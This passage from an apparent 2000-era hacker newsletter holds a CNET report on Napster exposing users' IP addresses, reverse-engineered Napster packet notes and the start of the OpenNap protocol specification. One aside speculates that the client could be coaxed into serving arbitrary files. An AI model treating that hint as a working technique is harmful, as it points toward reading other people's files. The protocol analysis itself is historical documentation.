ensure the safe use of their e-mail systems." UPS Document Exchange, launched in June 1998, is a secure Internet communications service for business-to-business commerce based on Tumbleweed Communication Corp.'s Integrated Messaging Exchange (IME technology. Tumbleweed Integrated Messaging Exchange (IME) is a set of products and services that leverage the Internet and existing e-mail to create a secure, trackable online communications channel. Thousands of businesses are currently using UPS Document Exchange to securely move critical documents, images and software over the 'Net. About Worldtalk Worldtalk Corporation is a leading provider of policy enforcement solutions for e-mail and Web communications. The company's WorldSecure policy management platform complements existing firewalls by enabling organizations to enforce usage policies for all Internet e-mail and Web communications. Worldtalk delivered the industry's first integrated solution for managing and enforcing e-mail security policies in September 1997. Since then, organizations have purchased WorldSecure solutions to ensure confidentiality of their external e-mail communications, protect their intellectual property, prevent SPAMs and viruses, and reduce the legal liabilities associated with Internet communications. Worldtalk products include WorldSecure/Web and the award-winning WorldSecure/Mail (previously known as WorldSecure Server), which are marketed and sold worldwide by Worldtalk, Value Added Resellers (VARs) and distributors. For more information, please visit us at http://www.worldtalk.com. About UPS United Parcel Service, the world's largest express carrier and package delivery company, is a leading commerce facilitator, offering an unmatched array of traditional and electronic commerce services. By offering fully integrated, web-enabled business-to-business solutions and working with other e-commerce leaders, UPS is changing the way people do business. The company has won numerous awards for its Web site and information technology infrastructure, including two Computerworld Smithsonian Awards. The Atlanta-based company operates in more than 200 countries and employs more than 330,000 people worldwide. UPS reported 1998 annual revenues of $24.8 billion. You can visit the UPS web site at www.ups.com. For more information, contact: Angela McMahon - UPS - 404-828-6840 amcmahon@ups.com Shannon Hakesley - Worldtalk - 408-567-5141 shannon.hakesley@worldtalk.com @HWA 61.0 HNN: Jan 27: Napster Reveals Users Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This seems like a very convenient and timely accident, I wonder if it wasn't engineered or leaked. This is the reason I didn't register with napster and haven't used it. Trust noone. - Ed From HNN http://www.hackernews.com/ contributed by acopalyse The popular MP3 trading software, Napster, may have a security hole. Internet security consultant Richard Smith, has found that Napster logs users' IP numbers. This information could be used to help copyright owners identify and try to prosecute Napster users who may be illegally trading music files. C|Net http://news.cnet.com/news/0-1005-200-1532962.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j (BTW this link looks wacked out but it is legit - Ed) Security problem discovered in Napster music software By Paul Festa Staff Writer, CNET News.com January 26, 2000, 3:30 p.m. PT Those who use Napster's popular software for trading digital music files may not be as anonymous as they think they are. Napster's program, which lets users see which digital music files other users possess, also exposes their Internet Protocol addresses, according to Internet security consultant Richard Smith. IP addresses are unique strings of numbers that identify users' computers on the Internet. That could help copyright owners identify and try to prosecute Napster users who may be illegally swapping music. "Napster has a problem," he said. "It's serious in the sense that they have exposed their users to legal risk." Napster acknowledged the problem but minimized its importance, saying that IP addresses are not easily procurable except by experienced network experts or hackers, and that individual IP addresses are more often than not obscured behind corporate or Internet service provider firewalls and proxy servers. "With our product, when you transfer from point to point, the IP address is available to you," said Eddie Kessler, Napster's vice president of engineering. "It's something that a hacker might have access to. In most cases, tracing an individual user would not be possible, but it is possible." Smith noted that IP addresses are traceable to individuals about a third of the time. Napster said it is working on hiding its users' IP addresses. "We're evaluating various technologies that would provide an even higher level of security to our users," Kessler said. "Specifically, they would not make your IP address visible to the person who was downloading content to you." Kessler would not say when the company expects to implement those changes. The trend in digital music copyright enforcement has been to target companies and larger institutions like universities rather than individuals. Napster itself is the target of a lawsuit by the Recording Industry Association of America (RIAA), which accused the company of "facilitating piracy" through its forum for letting online users trade unauthorized music files directly from their PCs. Another company under legal fire from the RIAA is music Web site MP3.com. Smith said he discovered the Napster security flaw after examining the documentation posted to the Web this week by Stanford University senior David Weekly. Weekly's post irked Napster, which asked him to pull the page. Weekly declined and encouraged the page's dissemination. Today Kessler said the matter with Weekly will rest there. "We're not going to play the DVD DeCSS game and try to shut it down," Kessler said, referring to the recent controversy over a piece of software called DeCSS that lets users circumvent copyright controls on DVDs. The Motion Picture Association of America has gone after sites to force them to take down copies of the tool. (Lets face it, if the fedz want to shut you down, you're toast they just don't put this on a priority level high enough to assign their limited man power to. There are bigger fish to fry, hackers aren't the only users of sniffers and anyone can arp -a netstat -a to see active connections...) @HWA Following up on this here's Weekly's site url http://david.weekly.org/ and here's the Napster breakdown (other info available on his site). I was asked to take this article down, but I politely declined. Since then, I've been informed that things will not escalate. For some strange reason, this writeup got mentioned on slashdot and news.com, although why beats the heck out of me. Yet To Discover How account setup is managed Administrative commands More details about sending/receiving files When "User Error" or such messages are sent january 26, 2000 corrected a few tidbits january 23, 2000 initial document release Network Configuration Napster appears to have cubes at globalcenter and at AboveNet Their main router at abovenet is 208.184.213.7 redirect servers: (server.napster.com:8875) 208.184.216.222 208.184.216.223 servers: 208.178.163.61 (globalcenter) 208.178.175.130-4 (globalcenter) 208.184.216.202,204-209,211-215,217-221 (abovenet @ sjc2:colo8) 208.49.239.242,7,8 (globalcenter) ports: 4444,5555,6666,7777,8888 Interesting. Looks like their general strategy is to cluster in units of 5 IP block (corresponding to grouped rackmounts?) with 5 sets of port numbers for process redundancy on the servers. I bet they started with GlobalCenter, but decided to move in with Abovenet at their SJC2 colocation facility, now that they have their stuff together. That's where the organized clusters are. The Globalcenter unit looks like it's not in California, but connected via an OC48 line to Globalcenter's Herdon, VA node. (Thanks to Ben Byer!) Protocol Breakdown Initial Connection DNS lookup server.napster.com SYN (connect) -> 208.184.216.222 [connects port 8875 on server to 1876 locally] RECEIVED 80 bytes of data: "208.49.239.247:5555" (zero-padded) RECEIVED 6 0-bytes (Keepalive/synch) RESPONDS with 2 0-size packets (ACK) SYN (connect) -> 208.49.239.247 [connects port 5555 (surprise) to port 1877 locally] SENT to server: 28 00 02 00 username password 23 "v2.0 BETA 5" 10 4398560 RECEIVED 6 0-bytes RECEIVED 10 00 00 00 "Invalid Password" RECEIVED 6 0-bytes connects again to main server, who suggests 208.178.175.133:8888 this time (fails) connects again to main server, who suggests 208.184.216.204 (succeeds) RECIEVES 00 00 10 00 03 00 anon@napster.com SENT 0A 00 0D 00 nuprin1715 RECEIVED 0E 00 D6 00 "979 147566 587" Request for Chat List SENT 00 00 69 02 (CHATLIST REQ) RECEIVED 26 00 6A 02 "Lobby 33 Welcome to the Lobby channel" 2E 22 00 6A 02 "Rap 27 Welcome to the Rap channel 2E 23 00 6A 02 "Game 0 Welcome to the Game channel" 2E 24 00 6A 02 "Rock 14 Welcome to the Rock channel" 2E 35 00 6A 02 "International 1 Welcome to the International channel" 2E ... 35 00 6A 02 "RadioVersions 0 Welcome to the RadioVersions Channel" 2E 00 00 69 02 (CHATLIST REQ) Joining a Channel SENT 06 00 90 01 "Trance" (JOIN REQUEST) RECEIVED 00 00 00 00 00 00 (SYNC) 06 00 95 01 "Trance" (JOIN GRANTED) 1B (string size) 00 98 01 "Trance username #songs conn#" (USER LISTING) ... 06 00 99 01 "Trance" (CHANNEL NAME) 25 00 9A 01 "Trance Welcome to the Trance channel" 2E (CHANNEL DESC) connection types: 10 = T3 (or greater) 9 = T1 8 = DSL 7 = Cable modem 6 = 128k ISDN 5 = 64k ISDN 4 = 56k Modem 3 = 33.6 Modem 2 = 28.8 Modem 1 = 14.4 Modem 0 = Unknown Talking on a Channel SENT 0C 00 92 01 Trance hello (size 00 92 01 channel message) RECEIVED 12 00 93 01 Trance myusername hello (size 00 93 01 channel user message) Private Messages SENT 0B 00 CD 00 myusername hello (size 00 cd 00 touser message) RECEIVED 0B 00 CD 00 myusername hello (size 00 cd 00 fromuser message) Whois Requests SENT 05 00 5B 02 username RECEIVED 3D 00 5C 02 username "User" 6025 "Trance " "Active" 127 0 0 10 "v2.0 BETA 5" Leaving a Chat Room SENT 06 00 91 01 Trance RECEIVED [6-byte ack] Searching for Songs SENT 41 00 C8 00 FILENAME CONTAINS "aaaa" MAX_RESULTS 123 LINESPEED "AT BEST" 8 BITRATE "AT LEAST" "128" FREQ "EQUAL TO" "32000" RECEIVED 00 00 CA 00 00 00 (NO RESULT) RECEIVED (on different query) 81 00 C9 00 "c:\WINDOWS\DESKTOP\mp3s\Nirvana-Lithium.mp3" (32-byte checksum) (size in bytes) (bitrate in kbps) (freq) (duration in seconds) (username) (magic cookie - "643813570") (line speed) 92 00 C9 00 "G:\Program Files\napster\Music\NIRVANA - Smells Like Teen Spirit.mp3" (32-byte checksum) ... 00 00 CA 00 00 00 [GASP!] Napster SENT the COMPLETE location of the file!!!! Does this mean that there is a way to coax the client to offer up ANY file? NOTE: ping time requirements not SENT to server (duh). Hotlisting a User SENT 0E 00 CF 00 username RECEIVED 0E 00 2D 01 username (user is online) 10 00 D1 00 username (user added to hotlist) Listing a User's Files SENT 0E 00 D3 00 username RECEIVED 85 00 D4 00 username "D:\Nyhemladdade mp3 or\POWER-BEAT - Dance Club Megamixes.mp3" (32-byte checksum) (size in bytes) (kbps) (freq) (length in seconds) ... (size) 00 D5 00 (username) (= END OF RESULTS) Requesting a File SENT 2A 00 CB 00 username "C:\MP3\REM - Everybody Hurts.mp3" RECEIVED 5D 00 CC 00 username 2965119704 (IP-address backward-form = A.B.C.D) 6699 (port) "C:\MP3\REM - Everybody Hurts.mp3" (song) (32-byte checksum) (line speed) [connect to A.B.C.D:6699] RECEIVED from client 31 00 00 00 00 00 SENT to client GET RECEIVED from client 00 00 00 00 00 00 SENT to client Myusername "C:\MP3\REM - Everybody Hurts.mp3" 0 (port to connect to) RECEIVED from client (size in bytes) SENT to server 00 00 DD 00 (give the go-ahead thru server) RECEIVED from client [DATA] Sending a File [no information yet] General Packet Format [chunksize] [chunkinfo] [data...] CHUNKSIZE: Intel-endian 16-bit integer size of [data...] in bytes CHUNKINFO: (hex) Intel-endian 16-bit integer. first byte: 00 - login rejected 02 - login requested 03 - login accepted 0D - challenge? (nuprin1715) 2D - added to hotlist 2E - browse error (user isn't online!) 2F - remove user from hotlist OR user is offline 5B - whois query 5C - whois result 5D - whois: user is offline! 69 - list all channels 6A - channel info 90 - join channel 91 - leave channel 92 - send text to channel 93 - receive text from channel 94 - user error 95 - join request granted 96 - user has joined channel 97 - user has left channel 98 - username entry for list 99 - channel name announcement 9A - channel description C8 - send search query C9 - query result CA - end of query results CB - request file CC - download reply CD - send/receive private message CE - download error (they hung up!) CF - add user to hotlist D1 - user is online (on hotlist) D3 - query user's file listings D4 - listing entry D5 - end of entries D6 - update from server (SONGS USERS GIGABYTES) DA - begin transmssion? DD - starting to transmit? F4 - Give push goahead (when connect port is 0) When you're requesting a file from another client, and they ask you to connect to port ZERO, they don't want you to pull the file from them; they want to push the file to you directly. If you receive this, send a 0-length F4 (Give Push Goahead) to the Napster server, and the other client will connect to you. (More tech info in next article - Ed) @HWA 62.0 Dissecting the Napster system ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ More info following up from previous article Source:http://opennap.sourceforge.net/napster.txt napster messages ================ by drscholl@users.sourceforge.net February 1, 2000 0. Forward This is meant to be an open specification. If you find errors or know of additional functionality not described hereafter, please send me email. It benefits the entire community to have a complete and accurate protocol specification. Not only does it allow for clients to be developed for any platform, but also decreases the strain on the server having to parse out bad client messages. Disclaimer: the following information was gathered by analyzing the protocol between the linux nap client and may not resemble the official windows client protocol. 1. Client-Server protocol each message to/from the server is in the form of where and are 2 bytes each. specifies the length in bytes of the portion of the message. Be aware that and appear to be in little-endian format (least significant byte goes first). For example, in the C language you would encode the number 1 as const unsigned char num[2] = { 0x01, 0x00 }; and 256 would be encoded as const unsigned char num[2] = { 0x00, 0x01 }; [The above is for illustrative purposes only, there are much quicker ways to actually encode a number. -ed] Note that in many cases, strings are passed as double-quoted entries. For example, filenames and client id strings are always sent as "random band - generic cowboy song.mp3" or "nap v0.8" Where required, double quotes are used in the description of the messages below. Some additional information about use of quotes inside of quotes: > The answer is, no, it doesn't do escaping of quotes. If you try searching > for the phrase 'a "quoted" string' on the windows client, you get no songs > found, and "invalid search request" printed in yellow in your console > window. (don't know what code that is, sorry.) > > and no wonder-- a little birdie told me that the client sends this: > > FILENAME CONTAINS "a "quoted" string" MAX_RESULTS 100 [contributed by Ben Byer . -ed] Note that unlike the IRC protocol, each line does NOT end in \r\n. The field specifies exactly how much data you should read. 2. Message Types The following section describes the format of the section for each specific message type. Each field is denoted with <>. The fields in a message are separated by a single space character (ASCII 32). Where appropriate, examples of the section for each message are given. can be one of the following (converted to big-endian): 0 error message [SERVER] 2 client login message [CLIENT] "" is the port the client is listening on for data transfer. if this value is 0, it means that the client is behind a firewall and can only push files outward. it is expected that requests for downloads be made using the 500 message (see below) is a string containing the client version info is an integer indicating the client's bandwidth 0 unknown 1 14.4 kbps 2 28.8 kpbs 3 33.6 kbps 4 56.7 kbps 5 64K ISDN 6 128K ISDN 7 Cable 8 DSL 9 T1 10 T3 or greater Example: foo badpass 6699 "nap v0.8" 3 3 login ack [SERVER] the server sends this message to the client after a succesful login (2). If the nick is registered, the address given at registration time is returned. If the nick is not registered, a dummy value is returned. 4 ??? [CLIENT] the latest napster v2.0beta5a sends this prior to login. 6 alternate login format [CLIENT] this message is used when logging in for the first time after registering (0x07) a nick "" note: this message is similar to the 0x02 message, with the addition of on the end Example: foo foo 6699 "nap v0.8" 3 email@here.com 7 client registration message [CLIENT] this message is sent to create an account response to this message is one of 8, 9 or 10 8 registration success [SERVER] the server sends this when the clients request to register a new nickname has succeeded. 9 nickname already registered [SERVER] the server sends this message when the nickname the client has requested has already been registered by another user 10 invalid nickname [SERVER] this server sends this message when the client attempts register an invalid nickname [what defines an invalid nickname? -ed] 11 ??? [CLIENT] [returns "parameters are unparsable" -ed] 14 login options [CLIENT] NAME:%s ADDRESS:%s CITY:%s STATE:%s PHONE:%s AGE:%s INCOME:%s EDUCATION:%s 100 client notification of shared file [CLIENT] ""